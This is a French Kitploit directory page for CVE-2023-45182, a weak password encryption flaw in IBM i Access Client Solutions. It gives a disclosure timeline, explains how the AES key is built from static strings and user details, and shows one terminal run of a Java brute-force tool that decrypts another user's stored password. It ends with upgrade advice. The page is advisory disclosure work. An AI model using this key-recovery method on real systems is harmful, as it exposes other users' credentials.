Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - Chiffrement faible des mots de passe | Kitploit
Outils/GitHubGitHub/afine-com/cve-2023-45182
Cassage de Mots de PasseOutils de Chiffrement/DéchiffrementAnalyse des VulnérabilitésExploitationCryptographie
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Chiffrement faible des mots de passe

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Faible chiffrement des mots de passe

Chronologie

  • Vulnérabilité signalée au fournisseur : 22.09.2023
  • Nouvelle version corrigée 1.1.9.4 publiée : 08.12.2023
  • Divulgation publique : 15.12.2023

Description

IBM i Access Client Solutions pour le stockage des mots de passe utilisateur utilise l'algorithme AES, mais la clé de chiffrement de 16 octets est la combinaison d'une chaîne statique (Thanatos) et de caractères aléatoires provenant d'une chaîne qui est elle-même composée d'une autre chaîne statique (Behemoth) combinée avec le nom d'utilisateur, le dossier personnel de l'utilisateur, le système d'exploitation (par exemple Linux) et le répertoire courant où l'application a été lancée. En conséquence, la moitié de la clé de chiffrement est statique (la chaîne Thanatos) tandis que l'autre moitié est très limitée. Cela permet à un attaquant de forcer le mot de passe par brute force très facilement, même sur un seul cœur de CPU.

Voici un exemple de déchiffrement du mot de passe de l'utilisateur mmajchrowicz à l'aide du script as400_password_bruteforce_tool.java depuis le compte mkubiak :

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

Ce problème a été causé par l'application d'un chiffrement faible des mots de passe. Ce problème est corrigé dans IBM i Access Client Solutions 1.1.9.4.

Versions affectées

< 1.1.9.4

Avis

Mettez à jour IBM i Access Client Solutions vers la version 1.1.9.4 ou une version ultérieure.

Références

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
Télécharger l’outil